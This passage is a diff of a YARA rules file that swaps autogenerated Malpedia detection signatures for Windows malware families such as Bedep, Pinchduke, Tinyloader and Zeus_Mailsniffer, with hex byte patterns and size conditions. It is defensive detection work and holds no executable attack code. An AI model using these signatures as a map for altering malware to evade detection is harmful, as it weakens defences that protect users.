+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.headertip"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.headertip_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "d4b2e1db63035282e2b2efcdd04dae6225d4a7dc6ab7fb9164349c69dbcffada"
+		logic_hash = "07b109a1a0d2271a95946a2e4133eb05992095f34ecb947954db0f3a5bf49d0e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102750,32 +102936,32 @@ rule MALPEDIA_Win_Deputydog_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bcb 33c0 8dbd2efdffff f3ab 66ab ff15???????? 8b3d???????? }
-		$sequence_1 = { 8b5108 894108 8b4508 5f }
-		$sequence_2 = { 897df0 53 50 8d8538ffffff }
-		$sequence_3 = { 8b4718 8b30 3bf0 0f8482000000 8b4e08 8d45e0 50 }
-		$sequence_4 = { 885dfc 59 8906 57 8d4dc8 ff15???????? 834dfcff }
-		$sequence_5 = { 56 6a03 33d2 5b 8bcb f7f1 8b4d0c }
-		$sequence_6 = { 8b7e08 8d1419 397d08 7417 8bc2 2bc1 2bc3 }
-		$sequence_7 = { e8???????? 8bf0 ff7514 8b06 834dfcff }
-		$sequence_8 = { 55 50 ffd3 ff7624 ffd7 896e24 8b4614 }
-		$sequence_9 = { 5f 0f84e9000000 8b7108 2bf0 3bf7 0f85a0000000 3810 }
+		$sequence_0 = { 56 e8???????? 83c40c ff7510 03f7 ffd6 85c0 }
+		$sequence_1 = { e8???????? eb2e ff75fc 53 }
+		$sequence_2 = { 68???????? 50 ff15???????? 83c410 85c0 750d }
+		$sequence_3 = { 83c40c 85ff 751c ff35???????? ff15???????? }
+		$sequence_4 = { 33c9 66894802 c3 53 }
+		$sequence_5 = { 03cb 894df8 eb3e 8b4018 }
+		$sequence_6 = { 885d10 c6452448 c6452574 c6452674 c6452770 c6452851 }
+		$sequence_7 = { 50 ff35???????? ff15???????? a3???????? 8d45b0 }
+		$sequence_8 = { ff35???????? c745fc80330000 ff15???????? 53 8d45fc 50 }
+		$sequence_9 = { 8b4114 2b410c 03c6 ebea 56 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 174080
 }
-rule MALPEDIA_Win_Doubleback_Auto : FILE
+rule MALPEDIA_Win_W32Times_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c1c6eec3-17ca-5077-8f4d-8926ef885c3f"
+		id = "7f8cab1b-98aa-5ea0-a38a-8a88f0f95260"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doubleback_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.w32times_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "a12a729d1e3eac6cc5269daa7ad2d63c829a0d3d51d586ba012dff78e07be60d"
+		logic_hash = "9e441675ff42eb62c793bece475e1238e60eea81c292e3ab2a330e03a3660487"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102789,32 +102975,32 @@ rule MALPEDIA_Win_Doubleback_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3dab3f0000 755e b9ad060000 eb57 b9a7060000 eb50 b947060000 }
-		$sequence_1 = { 742a 3d39380000 741c 3dd73a0000 740e 3dab3f0000 755e }
-		$sequence_2 = { b9e7050000 eb42 b9e3050000 eb3b b90b070000 eb34 }
-		$sequence_3 = { 740e 3dab3f0000 755e b9ad060000 eb57 }
-		$sequence_4 = { 741c 3dd73a0000 740e 3dab3f0000 755e b9ad060000 eb57 }
-		$sequence_5 = { eb49 b9e7050000 eb42 b9e3050000 eb3b b90b070000 eb34 }
-		$sequence_6 = { 774f 7446 3d00280000 7438 3d5a290000 }
-		$sequence_7 = { b9e7050000 eb42 b9e3050000 eb3b b90b070000 eb34 2d63450000 }
-		$sequence_8 = { 3dd73a0000 740e 3dab3f0000 755e b9ad060000 }
-		$sequence_9 = { 741c 3dd73a0000 740e 3dab3f0000 755e }
+		$sequence_0 = { 5d 5b 81c4ec0c0000 c3 85ed }
+		$sequence_1 = { 6a03 55 6a01 8d8c2410080000 6800000080 }
+		$sequence_2 = { 33db b900400000 33c0 8d7c2414 f3ab 8d442414 50 }
+		$sequence_3 = { 85c0 7505 bb02000000 6a28 }
+		$sequence_4 = { 53 52 50 ff15???????? 8b4c2434 83c424 51 }
+		$sequence_5 = { 7518 68???????? ffd6 68???????? c705????????01000000 }
+		$sequence_6 = { 8b15???????? 52 ffd3 892d???????? a1???????? 3bc5 7416 }
+		$sequence_7 = { c3 50 68???????? ff15???????? 83c408 32c0 5f }
+		$sequence_8 = { 8bf7 c1e902 8bfa 8d9424f4030000 f3a5 8bc8 }
+		$sequence_9 = { 83c40c 85c0 0f85e00c0000 8b4b04 6a04 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Polyglotduke_Auto : FILE
+rule MALPEDIA_Win_Bedep_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9c18a5b0-9646-54de-84d3-631d8bf608b5"
+		id = "50676d12-901b-5467-9cc0-ebfacf6cdb1b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.polyglotduke_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bedep_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "6e964f854be862afb1ae59446d85c2642af462845dbac22a50b518391d708853"
+		logic_hash = "3972e680d8fcfe1f525b24f026ad26b3e506bdc906b9b363e15bad8bf5e7bda8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102828,32 +103014,32 @@ rule MALPEDIA_Win_Polyglotduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4889442428 33d2 897dc0 4c89642420 ff15???????? 85c0 }
-		$sequence_1 = { 488d15804e0000 488bce 488905???????? ff15???????? 488bc8 ff15???????? 4c8bd8 }
-		$sequence_2 = { eb05 be04000000 488b4c2450 ff15???????? 488b4c2458 ff15???????? }
-		$sequence_3 = { 488bd8 4883f8ff 744d 488bc8 ff15???????? 488bcb 85c0 }
-		$sequence_4 = { eb0e 498bd7 488bcb e8???????? 488bf8 4d85ff 7408 }
-		$sequence_5 = { ff15???????? 4863f0 85c0 74d6 }
-		$sequence_6 = { 83f801 750e 498bd5 488bcf e8???????? 488be8 }
-		$sequence_7 = { 33c0 eb56 8364242800 488364242000 4c8bc1 b9e9fd0000 4183c9ff }
-		$sequence_8 = { 488bcb ba01000000 e8???????? 4c897c2438 4c897c2430 448bce }
-		$sequence_9 = { 4889742410 57 4881ec10010000 488b05???????? 4833c4 }
+		$sequence_0 = { 8d4608 50 ff75e8 90 e8???????? 84c0 7406 }
+		$sequence_1 = { 8d4608 50 e8???????? 68???????? 8d4610 50 e8???????? }
+		$sequence_2 = { 7d0f 8b11 8910 8b4904 894804 e9???????? 395de8 }
+		$sequence_3 = { 8930 897704 eb6c 8b5610 8b4710 83c23f 83e2c0 }
+		$sequence_4 = { ff9424d8010000 8bd8 85db 7504 6af1 ebda 6a0e }
+		$sequence_5 = { ff5108 8b45fc 5b c9 c20c00 6898000000 6a00 }
+		$sequence_6 = { 7605 8bd8 895df0 33d2 8d46ff f7f3 }
+		$sequence_7 = { ff751c ff750c ff7508 68???????? e8???????? 5d c22800 }
+		$sequence_8 = { 5e 5b c9 c21800 55 8bec 81ec80000000 }
+		$sequence_9 = { 51 56 8b35???????? 85f6 0f8d9b000000 6a05 b004 }
 
 	condition:
-		7 of them and filesize < 222784
+		7 of them and filesize < 557056
 }
-rule MALPEDIA_Win_T34Loader_Auto : FILE
+rule MALPEDIA_Win_Pinchduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "284a2fef-7ae8-56b0-9c93-6269ff81a414"
+		id = "0794d793-2c22-5bd4-a61c-badc5e0c2c07"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.t34loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.t34loader_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pinchduke_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f0b1763253e4022aabc3df13d81fa3a04dd6aace513ad41ab61bf012fd6fd102"
+		logic_hash = "59fabedb52194937fd24b19da68caeec236a55861258ee349d09c23df6cfa041"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102867,34 +103053,34 @@ rule MALPEDIA_Win_T34Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d0d13700400 807b5704 7704 488b4b48 4c8bc6 33d2 e8???????? }
-		$sequence_1 = { cd29 488d0deaba0400 e8???????? 488b442438 488905???????? 488d442438 }
-		$sequence_2 = { 4c897610 488bd5 e8???????? 498d0c36 eb59 498bd6 e8???????? }
-		$sequence_3 = { 448b45fc 4803cb e8???????? 0fb74706 488d6d28 ffc6 }
-		$sequence_4 = { 488bd9 4885d2 7504 33c0 eb10 4883c128 e8???????? }
-		$sequence_5 = { 0f84f4000000 498b01 488903 40886b10 e9???????? }
-		$sequence_6 = { 4533c0 410fb717 488bcd 488b4070 ff15???????? 3c3a 0f8581000000 }
-		$sequence_7 = { 0f8590090000 4883fb03 0f8486090000 458af1 488bd6 488bcf e8???????? }
-		$sequence_8 = { 448bcb ba02100000 498bce ff15???????? 85c0 7508 ff15???????? }
-		$sequence_9 = { 4533c0 4889442420 ff15???????? 488d542450 488d4c2430 e8???????? 488d9580070000 }
+		$sequence_0 = { 8b702c 8bfe c1cf08 23fa c1c608 23f1 0bfe }
+		$sequence_1 = { 7d06 8bc7 f7d8 eb02 8bc7 3bc3 750e }
+		$sequence_2 = { c745dc02000000 6810010000 e8???????? 85c0 59 740e ff75f0 }
+		$sequence_3 = { 53 56 57 bf10270000 57 e8???????? 6a04 }
+		$sequence_4 = { 3bc3 59 59 8945f0 0f84ec010000 68???????? 50 }
+		$sequence_5 = { 6a09 33ff 57 68???????? 6801000080 ffd3 85c0 }
+		$sequence_6 = { 57 50 6a00 8944241c ffd3 50 ffd5 }
+		$sequence_7 = { 334804 035dfc 33483c 8bfa 33481c c1c705 8975f4 }
+		$sequence_8 = { 334828 8bfe 334808 c1c705 33481c c14df002 8d943bdcbc1b8f }
+		$sequence_9 = { e8???????? 8d4dcc e8???????? 8d45f0 50 68???????? 6802000080 }
 
 	condition:
-		7 of them and filesize < 1212416
+		7 of them and filesize < 223680
 }
-rule MALPEDIA_Win_Tempedreve_Auto : FILE
+rule MALPEDIA_Win_Tinyloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9e025c63-22da-56b2-8f0f-12b35d9ea5db"
+		id = "895ccf2b-2f25-5f72-b650-0acb543eef11"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tempedreve_auto.yar#L1-L156"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinyloader_auto.yar#L1-L218"
 		license_url = "N/A"
-		logic_hash = "ff28ad4e45522fd6ad775c186581b049a8c3b1257f6ade7f519c8365bdcce952"
+		logic_hash = "b908cedbddd27a2a95532a03db9c626e01fc12979ac66acd61b30dfbfa8e2199"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -102906,38 +103092,44 @@ rule MALPEDIA_Win_Tempedreve_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8460020000 8b54242c 8bca c1e918 }
-		$sequence_1 = { 7511 f6c408 6a01 58 0f45c3 }
-		$sequence_2 = { 8b5d0c 8b4734 8b5110 03c3 3bd0 }
-		$sequence_3 = { 8a4102 24c0 3cc0 0f84d8010000 8a45fc }
-		$sequence_4 = { 8974242c ff15???????? 8d442428 68???????? }
-		$sequence_5 = { 6800800000 6a00 ff74243c ff15???????? ff742444 }
-		$sequence_6 = { 50 e8???????? 6a40 8d442464 }
-		$sequence_7 = { 59 c20c00 a1???????? 85c9 }
-		$sequence_8 = { 742e 8b4c2460 8b9610040000 2b542450 }
-		$sequence_9 = { 72c9 85c0 0f85a9090000 53 }
-		$sequence_10 = { 2bfb 75d7 8b8e14040000 8b16 }
-		$sequence_11 = { 7320 8d4d02 8be8 2b6c2428 8a0429 3a01 }
-		$sequence_12 = { 8b442404 8bc8 c1e903 8d440140 c20400 8b44240c }
-		$sequence_13 = { 740c 3b8e24040000 0f85c9000000 8b542430 }
-		$sequence_14 = { 0f85a9090000 53 8916 8d4e04 }
-		$sequence_15 = { 57 0fb6b90030cb00 d1c0 33c7 0fb6b90130cb00 d1c0 }
+		$sequence_0 = { f7d2 f7d1 5b 89d0 c1c010 6689c8 90 }
+		$sequence_1 = { 8b1d???????? 90 8998f8070000 90 }
+		$sequence_2 = { 48 83ec20 48 8d0dea0e0000 }
+		$sequence_3 = { 83c008 c70000000000 c7855808000000000000 8b5d00 039d58080000 6a00 }
+		$sequence_4 = { 31c9 ffc9 89ca 31c0 31db }
+		$sequence_5 = { ff15???????? 83f8ff 7405 83f800 7505 e9???????? 018558080000 }
+		$sequence_6 = { 894304 8b5d00 83bb0004000000 750a c783000400000c000000 8b8540050000 }
+		$sequence_7 = { 50 ff95b0020000 83bd4005000001 7502 eb0c c7854005000000000084 }
+		$sequence_8 = { 8b1d???????? 90 895830 90 }
+		$sequence_9 = { fb 6804000073 0d904883c0 0490 }
+		$sequence_10 = { 895830 90 8b1d???????? 90 895838 90 }
+		$sequence_11 = { 68???????? ff15???????? 8d3500304000 89c7 53 }
+		$sequence_12 = { 31c1 31da ffcf 75d4 f7d2 }
+		$sequence_13 = { eb0c c7854005000000000084 eb0a c78540050000000000ba 6a40 6800300000 6800400100 }
+		$sequence_14 = { 48 895838 90 48 89c6 90 }
+		$sequence_15 = { ff33 ff7500 ffb5b8050000 ff15???????? 83f8ff }
+		$sequence_16 = { 6a01 6a02 ff15???????? 8985b8050000 6832a00000 }
+		$sequence_17 = { 8d0dca110000 48 8d15c3110000 49 c7c000010000 }
+		$sequence_18 = { 6800010000 68???????? 6a00 ff15???????? 6800010000 68???????? 68???????? }
+		$sequence_19 = { 8b5d00 894308 8b85f8070000 8b5d00 894304 }
+		$sequence_20 = { 90 81fb04030000 730d 90 }
+		$sequence_21 = { 90 8bbb97114000 90 8938 90 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Cotx_Auto : FILE
+rule MALPEDIA_Win_Darkbit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "618247d4-de94-5a5b-8702-f02eb35ee904"
+		id = "17d9f575-1833-580e-9f9a-26ac57d772c0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cotx_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkbit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkbit_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3b8fe5510fd419b8c1ff3124a08904512765ac561abd89e88faa984449f17fc2"
+		logic_hash = "a8284822bcb0339f6639d77d907a6e073020f408fd2caaa614e40aa5d0446833"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102951,32 +103143,32 @@ rule MALPEDIA_Win_Cotx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c705????????5411e14c c705????????2b3d0396 c705????????e54dcca2 c705????????92d61819 c705????????0c56aef3 c705????????c8a4ea05 }
-		$sequence_1 = { 50 0f2805???????? 8d85bcfbffff 0f1145d0 }
-		$sequence_2 = { c705????????2b342411 c705????????4a06d5fe c705????????5411e14c c705????????2b3d0396 c705????????e54dcca2 c705????????92d61819 c705????????0c56aef3 }
-		$sequence_3 = { 84c0 75f8 0f2805???????? 8d85bdfaffff 8bca c785b8faffff39313044 }
-		$sequence_4 = { e8???????? 83c438 8d8500f8ffff 6a00 }
-		$sequence_5 = { 84c0 75f9 8dbd98faffff 2bd6 }
-		$sequence_6 = { 8d45fc 50 8b8574fdffff 83c008 50 ff75ec ff15???????? }
-		$sequence_7 = { c785b8faffff39313044 c1e902 f3a5 8bca }
-		$sequence_8 = { c705????????8e220b1d c705????????6825794d c705????????4506ce62 c705????????b60451f0 c705????????3f3f5288 }
-		$sequence_9 = { 6800040000 8d8598f6ffff 6a00 50 e8???????? 83c40c 8d8598feffff }
+		$sequence_0 = { e8???????? 488d0d93861800 48898c2488010000 4889842490010000 488b8424f8010000 488b9c2478010000 488b8c2490000000 }
+		$sequence_1 = { e8???????? 488d3d5b7d2200 e8???????? e8???????? 48898424e0240000 48899c24b0080000 488b0d???????? }
+		$sequence_2 = { eb42 48898424d0020000 48899c24f0000000 488d0504370300 488b9c24d8020000 e8???????? 488b9c24f0000000 }
+		$sequence_3 = { b91b000000 e8???????? 90 488b15???????? 488b8c2498000000 31ff 4889c6 }
+		$sequence_4 = { e8???????? 488d05533f3800 bb1e000000 e8???????? 488d05a0293800 bb11000000 e8???????? }
+		$sequence_5 = { ebd7 4885db 742e 4889b110010000 48899118010000 488d05cc9b3700 e8???????? }
+		$sequence_6 = { 90 90 488d0511971600 bb01000000 4889d9 e8???????? 4889842438010000 }
+		$sequence_7 = { e8???????? 488d3d8fdd2100 e8???????? 6690 e8???????? 48898424681d0000 48899c2438010000 }
+		$sequence_8 = { 90 4c8ba424e0030000 4d21d4 4d21e9 4d09cc 4c89a42410070000 48c784244006000000000000 }
+		$sequence_9 = { 90 c744245b44588096 c644245fcd c74424562c14e1d8 c644245a6c 31c0 e9???????? }
 
 	condition:
-		7 of them and filesize < 1171456
+		7 of them and filesize < 11612160
 }
-rule MALPEDIA_Win_Unidentified_053_Auto : FILE
+rule MALPEDIA_Win_Shatteredglass_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "44778796-93f3-5879-994d-5e3e2324b3e0"
+		id = "b5759aec-876a-5e51-92c3-b5c3cd47ebed"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_053_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shatteredglass"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shatteredglass_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "0ba9fcbf3221aa7fe9aa16ac81cd13a3c2e0b0b30a12bf9f5e09619187f5d921"
+		logic_hash = "01b6c47460c5c08264d9ff26f8c68c9d17064a107dafa21abd25815194e46710"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102990,32 +103182,32 @@ rule MALPEDIA_Win_Unidentified_053_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f857afeffff 393cb500924100 742e a1???????? 8d70ff 85f6 }
-		$sequence_1 = { 0fb6bdb0fffcff c1e208 0bd7 03d0 2bca 6a00 }
-		$sequence_2 = { 754d 53 57 8d3c85a8914100 833f00 bb00100000 7520 }
-		$sequence_3 = { 7e13 8d048dfc914100 3938 7408 4a }
-		$sequence_4 = { 8a6e1b 0fb64619 0fb67df4 8a4e1a }
-		$sequence_5 = { 81e9003ca875 87d6 4e 46 87d6 81c1003ca875 }
-		$sequence_6 = { 0fb6d2 f6820194410004 7406 8b10 41 }
-		$sequence_7 = { c1c719 e8???????? 87f2 e8???????? 2bd5 }
-		$sequence_8 = { 891d???????? 4a 87d6 8915???????? 03f7 46 893d???????? }
-		$sequence_9 = { 8b048588814100 234508 8b4e14 8d04c1 0fb64801 8b5004 83fa10 }
+		$sequence_0 = { 59 eb3c 8b9530e5ffff 8b8528e5ffff 8b8d24e5ffff 8b0485d0d14100 f644010440 }
+		$sequence_1 = { ff15???????? 57 ff15???????? 8b4dfc 8a45e7 33cd 5f }
+		$sequence_2 = { 75f5 2bce d1f9 83f918 }
+		$sequence_3 = { 68???????? 56 ffd7 68???????? 68???????? 8d85f8feffff }
+		$sequence_4 = { 7c88 33f6 8d9b00000000 0fb70c73 }
+		$sequence_5 = { 8d4900 0fb70c77 8d41d0 6683f809 7705 }
+		$sequence_6 = { 68???????? 68???????? e8???????? 8b3d???????? 83c408 837c241001 7576 }
+		$sequence_7 = { b810000000 2bc6 50 8d8640d74100 50 57 ffd3 }
+		$sequence_8 = { 888840d74100 83fe20 7c88 8b3d???????? }
+		$sequence_9 = { 8d410d 8d642400 8a08 8a5001 8a6802 8a70ff }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 273408
 }
-rule MALPEDIA_Win_Mortalkombat_Auto : FILE
+rule MALPEDIA_Win_Zeus_Mailsniffer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5eb05f16-7725-598c-b79d-b9528e7759ee"
+		id = "cfc6ae1c-00c8-513e-86f0-d4e28caf1338"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mortalkombat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mortalkombat_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeus_mailsniffer_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "44f11e1302873d7b8732182da9f21833a01d02537c804d5a52bde5d4fbe797c8"
+		logic_hash = "fa3a7d3b021e61998435bd86dd4adccaaab84e20b590af9e4f54303f32d0d67f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103029,32 +103221,32 @@ rule MALPEDIA_Win_Mortalkombat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 83c4a4 c745d030000000 c745d403200000 }
-		$sequence_1 = { 68???????? e8???????? 83c710 6a04 57 }
-		$sequence_2 = { e8???????? eb14 6a10 68???????? 68???????? }
-		$sequence_3 = { 0f85a6010000 833d????????00 7506 ff0d???????? 68???????? }
-		$sequence_4 = { 0fca 890d???????? 8915???????? 8b4808 8b500c 0fc9 }
-		$sequence_5 = { 4c 006800 0200 0068b9 6640 00684d 214000 }
-		$sequence_6 = { 8d85e8feffff 50 68???????? e8???????? 85c0 0f8419030000 }
-		$sequence_7 = { ff7508 68???????? e8???????? eb1d 68f5010000 }
-		$sequence_8 = { 6a01 6800000080 68???????? e8???????? 8945fc }
-		$sequence_9 = { 6640 00684d 214000 e8???????? }
+		$sequence_0 = { 81ec1c020000 56 6a1c 58 8945f0 c745f4c89d2d01 8945f8 }
+		$sequence_1 = { 2b75fc 57 57 ff7510 81c6???????? 56 57 }
+		$sequence_2 = { c20400 a1???????? 89442430 8d842450020000 50 c744242cf54f2d01 c744243041512d01 }
+		$sequence_3 = { 6800300000 50 57 53 8945e8 894dfc ff15???????? }
+		$sequence_4 = { 8b4508 895dec e8???????? 8b7b0c 037d08 8365fc00 }
+		$sequence_5 = { 53 8d4594 50 8d4588 }
+		$sequence_6 = { 0f84a0000000 e8???????? 50 ff35???????? e8???????? 59 59 }
+		$sequence_7 = { d1e8 83e701 3304bd00d02d01 33048d04992e01 42 }
+		$sequence_8 = { 8d45dc 50 ff15???????? 66837ddc00 8b87a0902d01 7403 6a29 }
+		$sequence_9 = { ffd7 85c0 7570 8bc6 50 8d84249c030000 }
 
 	condition:
-		7 of them and filesize < 1224704
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Latentbot_Auto : FILE
+rule MALPEDIA_Win_Tigerlite_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6a00a894-4935-5534-b5e9-c8d6ecaeaacd"
+		id = "2f8f693e-a8e1-5528-af21-1e49257d2d13"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.latentbot_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tigerlite"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tigerlite_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "0b0eb24e4417089c175072116bffcac1a7119a8a9d763a31cda53b89f6d3beef"
+		logic_hash = "97a4326cdfea07521b42c0aaec8304cc4bf3187afbba14d3d8ecb63bd75d0ec6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103068,32 +103260,38 @@ rule MALPEDIA_Win_Latentbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 6aff ff36 895dfc ffd0 85c0 7d13 }
-		$sequence_1 = { c3 e8???????? 85c0 740c c7460802000000 e8???????? 33c0 }
-		$sequence_2 = { ff742410 ff742410 e8???????? c20800 55 8bec 51 }
-		$sequence_3 = { c3 55 8bec 83ec24 b874657874 8945e4 8945dc }
-		$sequence_4 = { 59 59 33c0 c3 55 8bec 83ec38 }
-		$sequence_5 = { 83c418 eb02 33ff 57 6aff ff542418 5f }
-		$sequence_6 = { 53 55 56 57 8b790c 8b770c }
-		$sequence_7 = { 8945dc 64a118000000 8b4030 53 8b5808 8b433c }
-		$sequence_8 = { ffd0 4c 8b542468 45 33c9 45 33c0 }
-		$sequence_9 = { 57 53 894da8 ffd6 8bf0 83fe01 7569 }
+		$sequence_0 = { 754a 488d0d2b4a0000 e8???????? 488d15fb130100 488d0dd4130100 e8???????? }
+		$sequence_1 = { 488bd8 e8???????? 488bcb ff15???????? 488bcb 488bf8 e8???????? }
+		$sequence_2 = { eb0f 8b45f4 8b0485489d4100 804c180402 }
+		$sequence_3 = { 48890d???????? 488905???????? 488d0517410000 48890d???????? 488905???????? }
+		$sequence_4 = { 83e11f c1e106 8b0485489d4100 80640804fe ff15???????? 50 }
+		$sequence_5 = { 488bd7 ff15???????? 83f8ff 0f8465020000 488d4c2451 33d2 41b8ff030000 }
+		$sequence_6 = { 33c5 8945fc 53 56 8d85a4faffff 57 50 }
+		$sequence_7 = { 2b349d489d4100 c1fe06 8bc3 c1e005 03f0 8975e4 }
+		$sequence_8 = { 33c0 c644244000 3905???????? 89442441 750b }
+		$sequence_9 = { 488d15bfd20000 483305???????? 488bcb 488905???????? ff15???????? 488d15b9d20000 }
+		$sequence_10 = { 6a20 8bfa 8bf1 f30f7f45e9 }
+		$sequence_11 = { 7e32 0fb617 0fb64701 83e203 c1e804 03d2 }
+		$sequence_12 = { 56 33f6 ffb644854100 ff15???????? 898644854100 83c604 }
+		$sequence_13 = { 7405 b9???????? e8???????? 833d????????06 750c eb27 c705????????00000000 }
+		$sequence_14 = { 488d542430 6689442420 0fb605???????? 4d8bf9 88442422 8b05???????? }
+		$sequence_15 = { 4863c2 4863c9 488d14c8 420fbe940ab0730100 }
 
 	condition:
-		7 of them and filesize < 401408
+		7 of them and filesize < 349184
 }
-rule MALPEDIA_Win_Socksbot_Auto : FILE
+rule MALPEDIA_Win_Dexter_Auto : FILE
 {
 	meta:
